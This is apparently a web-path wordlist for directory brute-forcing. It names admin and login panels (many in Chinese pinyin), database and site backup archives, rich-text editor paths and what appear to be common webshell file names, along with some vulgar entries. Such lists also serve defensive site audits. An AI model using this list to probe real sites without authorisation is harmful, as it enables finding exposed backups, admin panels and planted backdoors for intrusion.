/wish.asp
/wish.aspx
/wish.php
/wish/
/wizmysqladmin
/wjleft.asp
/wjleft.aspx
/wjleft.php
/woaini.asp
/woaini.aspx
/woaini.php
/wocaonima.asp
/wocaonima.aspx
/wocaonima.php
/wocaonima/
/work
/work.asp
/work.aspx
/work.php
/work/
/working
/working/
/wp-admin
/wp-admin/
/wp-login
/write.asp
/write.aspx
/write.php
/wrtxcnqywz4.asp
/wrtxcnqywz4.aspx
/wrtxcnqywz4.php
/ws.asp
/ws.aspx
/ws.php
/WsManage
/WsManage/
/wstats
/wstats.asp
/wstats.aspx
/wstats.php
/wstats/
/www
/www.asp
/www.aspx
/www.php
/www.rar
/www.zip
/www/
/www_admin/
/wwwlog.asp
/wwwlog.aspx
/wwwlog.php
/wwwlog/
/wwwroot.rar
/wwwroot.zip
/wygkcnqyhtml.asp
/wygkcnqyhtml.aspx
/wygkcnqyhtml.php
/wzgg.asp
/wzgg.aspx
/wzgg.php
/x
/x.asp
/x.aspx
/x.php
/x/
/xh_login.asp
/xh_login.aspx
/xh_login.php
/xiao.asp
/xiao.aspx
/xiao.php
/xiaolu.asp
/xiaolu.aspx
/xiaolu.php
/xiaoma.asa
/xiaoma.asp
/xiaoma.aspx
/xiaoma.php
/xlogin
/xm.asa
/xm.asp
/xm.aspx
/xm.php
/xml/
/xs_admin/
/XtAdmin
/XtAdmin/
/xwzx.asp
/xwzx.aspx
/xwzx.php
/xwzx/
/xx.asp
/xx.aspx
/xx.php
/xxms/
/xxmslogin.asp
/xxmslogin.aspx
/xxmslogin.php
/xxx.asp
/xxx.aspx
/xxx.php
/xzdata/
/xzsysadmin/
/y
/y/
/ybkc/
/ybxygy/
/ydxzdate.asa
/yes.asp
/yes.aspx
/yes.php
/yes/
/Ylxd/
/yns_login.asp
/yns_login.aspx
/yns_login.php
/yns_login/
/yonetici.asp
/yonetici.aspx
/yonetici.html
/yonetici.php
/yonetim.asp
/yonetim.aspx
/yonetim.html
/yonetim.php
/ytadmin/
/yx_Update.asp
/yx_Update.aspx
/yx_Update.php
/z
/z.asp
/z.aspx
/z.php
/z/
/Z-Blog/
/Zcfg/
/zhuye/
/zip
/zip/
/zips
/zips/
/zjpic/
/zkcf/
/zkcf/login.asp
/zkcf/login.aspx
/zkcf/login.php
/zkcf45/
/zllm.asp
/zllm.aspx
/zllm.php
/zm_marry.asp
/zm_marry.aspx
/zm_marry.php
/zs_save_add.asp
/zs_save_add.aspx
/zs_save_add.php
/zxly.asp
/zxly.aspx
/zxly.php
/zyadmin/
/zz.asp
/zz.aspx
/zz.php
/Zzm.asp 
/Zzm.aspx 
/Zzm.php 
/zzz.asp
/zzz.aspx
/zzz.php
/admin/
/admin_index/
/admin_admin/
/index_admin/
/GfEditor/
/admin/
/index/
/EditBox/
/default/
/manage/
/hywindow/
/ytadmin/
/kefu/
/login/
/zhuye/
/kfuser/
/Link/link_admin/
/Link/admin/
/Link/login/
/manage_index/
/zjpic/
/index_manage/
/wocaonima/
/admin1/
/Apache/
/admin_IF5KBM/
/Web_Editor/
/ADSFGLKN32KFB/
/admin_login/
/login_admin/
/ad_login/
/ad_manage/
/count/
/manager/
/guanli/
/denglu/
/houtai/
/houtaiguanli/
/adminlogin/
/adminuserlogin/
/adm_login/
/chklogin/
/chkadmin/
/user/
/users/
/adduser/
/adminuser/
/admin_user/
/edituser/
/adminadduser/
/member/
/members/
/editmember/
/adminmember/
/addmember/
/logout/
/login_out/
/edit/
/adminedit/
/admin_edit/
/delete/
/szwyadmin/
/admindelete/
/admin_delete/
/admindel/
/admin_del/
/up/
/Zcfg/
/Z-Blog/
/Ylxd/
/xml/
/wap/
/Skin/
/shop/
/Qybz/
/PJBLOG/
/guestbook/
/health/
/language/
/law/
/sitemap/
/bbss/
/manage888/
/tongji/
/cert/
/tungou/
/dns/
/ybkc/
/ybxygy/
/menu/
/PayOnline/
/!admin!/
/gg/
/indexximg/
/mms/
/show/
/yes/
/net/
/Llyj/
/upload/
/upfile/
/backup/
/cmseditor/
/config/
/webmaster/
/SouthidcEditor/
/root/
/aadmin/
/admintab/
/admin_main/
/main/
/index.htm
/article/
/databases/
/database/
/db/
/dbase/
/devel/
/kwadmin/
/file/
/files/
/forum/
/htdocs/
/idea/
/ideas/
/include/
/includeinc//
/includes/
/incoming/
/install/
/manual/
/misc/
/private/
/program/
/programming/
/programs/
/public/
/set/
/setting/
/setup/
/source/
/sources/
/statistics/
/Stats/
/usage/
/weblog/
/weblogs/
/webstats/
/work/
/wstats/
/wwwlog/
/wenzhang/
/blog/
/server_stats/
/super/
/login1/
/telephone/
/update/
/count_admin/
/add_admin/
/admin_pass/
/newbbs/
/down/
/bbs/
/eye2007/
/boss/
/Product/
/admin_jy1001/
/WebAdmin/
/bbsxp/
/eneya888/
/localhost/
/admin_999/
/eneya/
/ManageAdmin/
/news/
/l888/
/editor/
/ew/
/ewebeditor/
/myadmin/
/admin868/
/manage_admin/
/admin_cp/
/wish/
/link/
/e/
/texteditor/
/mystat/
/manager_admin/
/links/
/managenews/
/xs_admin/
/SysManage/
/manage_news/
/admin99/
/admin_manage/
/admin_manager/
/htmedit/
/gm/
/Ms-admin/
/DvForum/
/admin_info/
/guest/
/land/
/admincn2008/
/222/
/union//vip_manage/
/liuyan/
/4/
/5/
/6/
/AdSystem/
/Ad_Admin/
/Add/
/Adm/
/AdmSystem/
/Admin2/
/Admin3/
/AdminCp/
/Admin_Bak/
/Admin_Test/
/AdministrAtion/
/Administrators/
/Asp/
/Asp_Admin/
/AspmyAdmin/
/Back/
/BackAdm/
/BackAdmin/
/BackAdmins/
/BackEnd/
/Bbs1/
/Check/
/CheckLogin/
/College/
/Comm/
/Library/
/Conf/
/Console/
/Console/Login/
/Login_From/
/ControlPanel/
/NewAdmin/
/NewWeb/
/News_Admin/
/Office/
/Ok/
/Oldweb/
/Other/
/PhpMyAdmin/
/Product/Manage/
/Reg/
/Register/
/SAdmin/
/SManager/
/Shop/Admin/
/Show/Back/
/Site/
/Sql/
/SqlConf/
/Store/
/Stores/
/SupplierAdm/
/SysAdmin/
/SysAdmins/
/download/
/spzs/
/SysManager/
/mydatazw/
/tot_dabase/
/KS_Data/
/dxy/
/bbs-data/
/blogDB/
/xzdata/
/HXMYDATABASE/
/sjk2008/
/DB_UserData/
/AccessDB/
/Foosun_Data/
/cpgl/
/whj/
/Data.project/
/ggjdsd/
/HxData/
/cnkdata/
/DataCy/
/data_jk/
/Admin_Cy/
/_database/
/dxxobbs/
/blogdata/
/Sys_Login/
/SEM_User/
/System/
/xzsysadmin/
/admin_php/
/job/
/mba/
/bbslogin/
/Systems/
/eye2008/
/cnlogin/
/admin_loginadmin/
/eye2009/
/Teens/
/Test/
/webeditor/
/htmledit/
/doc/
/girls/
/docs/
/mail/
/serial/
/serials/
/zip/
/zips/
/suzhijy/
/p/
/cx/
/ads/
/adminn/
/sex/
/usr/
/z/
/y/
/x/
/www/
/working/
/usrs/
/webhome/
/v/
/valid/
/warez/
/validate/
/validated/
/virgin/
/w/
/upl/
/uploads/
/uploadz/
/us/
/top/
/sexy/
/u/
/temp/
/t/
/thumb/
/thumbs/
/thumbz/
/tmp/
/today/
/tab/
/teen/
/teenz/
/support/
/solution/
/stat/
/supervise/
/supervisor/
/solutions/
/stuff/
/shemales/
/shtml/
/service/
/services/
/serialz/
/mails/
/passwordz/
/run/
/secure/
/security/
/script/
/scripts/
/secrets/
/secret/
/s/
/report/
/reports/
/review/
/reviews/
/pers/
/pic/
/r/
/puppy/
/pwd/
/pwds/
/q/
/protect/
/protected/
/prv/
/pub/
/picpost/
/product/
/products/
/prog/
/power/
/preview/
/previews/
/previewz/
/priv/
/picposts/
/pics/
/picture/
/pictures/
/picturez/
/post/
/perso/
/personnal/
/photo/
/photos/
/php_Admin/
/newhome/
/mod/
/mods/
/old/
/pass/
/passwords/
/older/
/password/
/oldies/
/newz/
/o/
/oh/
/module/
/n/
/mon/
/monitor/
/monitors/
/movies/
/gly/
/hardcore/
/manga/
/mirror/
/mirrors/
/mangas/
/messy/
/lost/
/linkz/
/list/
/graph/
/graphic/
/m/
/htdl/
/lesb/
/lesbian/
/lesbians/
/lesbo/
/lez/
/htdoc/
/guanliyuan/
/j/
/l/
/k/
/ids/
/image/
/images_dir/
/imagez/
/html/
/i/
/id/
/help/
/hidden/
/hide/
/home/
/houtaidenglu/
/h/
/graphics/
/graphs/
/girlz/
/girl/
/entry/
/esuper/
/g/
/gal/
/galleries/
/gallery/
/game/
/games/
/gamez/
/food/
/f/
/front/
/fucks/
/ftp/
/filez/
/final/
/free/
/freepic/
/freepics/
/esuperadmin/
/event/
/email/
/en_US/
/emails/
/door/
/downloads/
/downloadz/
/driver/
/drivers/
/double/
/Trade/
/auto/
/backups/
/asian/
/cgi-bin/
/cgibin/
/dir/
/dirs/
/dhtml/
/code/
/dl/
/common/
/crack/
/debug/
/cracks/
/crackz/
/content/
/contents/
/codes/
/coding/
/cat/
/cgi/
/catalog/
/catalogs/
/certif/
/certificate/
/certificates/
/certified/
/certify/
/cfg/
/binaries/
/binary/
/bizarre/
/black/
/book/
/books/
/c/
/asians/
/bin/
/app/
/apps/
/appz/
/arc/
/archive/
/archives/
/al/
/amateur/
/amateurs/
/amd/
/amd_007/
/ani/
/ani1/
/anime/
/UpdDate/
/User_Admin/
/User_Login/
/adlogin/
/adm@in/
/Web/
/adminpages/
/abc/
/admanage/
/abcupload/
/about/
/account/
/accounts/
/Web1/
/Web2/
/WebApps/
/Web_Master/
/WeiHu/
/WsManage/
/XtAdmin/
/_Admin/
/Cp/
/Local/
/Log/
/MainTain/
/Manager_Login/
/Managers/
/MemberLogin/
/Mgr/
/Mmgr/
/Mybbs/
/New/
/EAdmin/
/Fuck/
/Gb/
/HYTop.mdb
/Hello/
/Images/
/InFile/
/InTranet/
/Inc/
/Les/
/7/
/8/
/88888/
/9/
/2001/
/2002/
/2003/
/2004/
/2005/
/2006/
/2007/
/2008/
/22/
/2/
/oldbbs/
/11111/
/123/
/tryread/
/FCKeditor/
/11/
/111/
/dvbbs/
/FTB/
/UploadSoft/
/pscms_admin/
/dede/
/lzwadmin/
/addmin/
/Admin_ZgTea_Art/
/amdin/
/Control/
/dede_bbs/
/sys//asjobcom/
/gbook/
/AdminFile/
/lyb/
/book1/
/inside/
/ht/
/htgl/
/gl/
/sys_admin/
/st-admin/
/admin888/
/admin123/
/adminindex/
/ad/
/indexadmin/
/adminadmin/
/www_admin/
/adminpt/
/szwyadmin/
/webmis/
/adminmain/
/Manage_Auto/
/guanli_admin/
/admins/
/adadmin/
/system_admin/
/web_admin/
/Cityadmin/
/systemadmin/
/newsadmin/
/data/
/phpeditor/
/shopadmin/
/ewebedit/
/xxms/
/yns_login/
/smhththt/
/administrator/
/manage123/
/xwzx/
/cnzz/
/admin_yuzhiguo/
/toucher/
/asp-bin/
/fpv_admin/
/cn/
/tacforo/
/sxadmin/
/cjcx/
/bestcollegepicks/
/profile/
/2005kycj/
/stock/
/careerfocus/
/zkcf45/
/zkcf/
/webpet/
/memmng/
/project/
/acct/
/zyadmin/
/Kes/
